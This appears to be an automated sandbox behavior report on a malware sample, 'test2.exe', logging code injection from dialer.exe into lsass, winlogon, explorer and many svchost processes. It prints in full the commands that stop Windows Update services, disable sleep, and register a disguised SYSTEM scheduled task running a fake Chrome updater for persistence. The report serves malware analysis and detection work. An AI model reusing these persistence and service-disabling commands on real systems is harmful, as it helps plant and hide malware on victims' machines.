      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256199A0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BAD1F10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 298A7C30000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E928AC0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1AEC6560000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1CCAD210000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F4E9D50000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 17E7E4F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1947A0F0000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 2A663B10000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C7FC420000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1A49CF30000 value starts with: 4D5A
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 29C55440000 value starts with: 4D5A
      Injects code into the Windows Explorer (explorer.exe)
      Source: C:\Windows\System32\dialer.exeMemory written: PID: 4992 base: A850000 value: 4D
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\test2.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
      Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonly
      Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\powercfg.exe protection: readonly
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\test2.exeThread register set: target process: 1444Jump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 5060
      Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 7736
      Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 3188
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\test2.exeMemory written: C:\Windows\System32\dialer.exe base: E8A2DDC010Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2854D4A0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 207A9DD0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD5DBD0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1F5E4E40000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20C21EB0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21F155B0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F7E7490000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 248DE760000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B79C800000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418340000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 276DFF70000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25C22470000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D45E7A0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D05B7A0000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DA40000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F93870000Jump to behavior
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28813580000Jump to behavior
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1F67D180000
      Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: D66630D010
      Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: C0FC850010
      Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 94DC2E8010
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2854D500000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 207AA820000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD5E910000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1F5E4EA0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20C21F10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21F15DD0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F7E74F0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 248DE7C0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B79C860000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 29418CA0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 276DFFD0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25C224D0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D45E800000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D05BE40000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1B66DAA0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 20F938D0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 288135B0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24099670000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23C4EE30000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CF94FD0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1859E0F0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E099DB0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20541B40000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A83C320000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23092210000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23375660000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21CDFC50000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23236730000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BB2B50000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CE39510000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23C2F6F0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A17C60000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: CA0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EFC9BA0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DE50F10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17660BD0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 11F7E5D0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20A36710000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14F491D0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A0A2600000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 22BEFFD0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18C35FB0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EC35F90000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 210BFBC0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 231A7AD0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 281ED520000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 1B29C900000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C3354B0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 20219540000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26F66570000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: BE0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C74BF50000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29902C80000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26C52290000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1DFBA830000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C27EF90000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: A850000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 240A7930000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 183ED2A0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D37AF10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\SettingSyncHost.exe base: 1FEFD650000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27ADB570000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C4355A0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17708DF0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0FD030000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 182E47D0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 21671A10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 700000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15357E10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 226DF760000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C5EE060000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256199A0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BAD1F10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 298A7C30000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E928AC0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1AEC6560000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1CCAD210000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F4E9D50000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 17E7E4F0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1947A0F0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 2A663B10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C7FC420000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1A49CF30000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 29C55440000
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#yaqvbk#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
      Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#yaqvbk#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#yaqvbk#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }Jump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#yaqvbk#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
      Source: winlogon.exe, 00000012.00000000.4430178071.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000012.00000002.5689013568.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.5740200225.000001F5E395F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: winlogon.exe, 00000012.00000000.4430178071.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000012.00000002.5689013568.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.5714749777.000001F5DCD31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: winlogon.exe, 00000012.00000000.4430178071.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000012.00000002.5689013568.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.5714749777.000001F5DCD31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: winlogon.exe, 00000012.00000000.4430178071.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000012.00000002.5689013568.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.5714749777.000001F5DCD31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
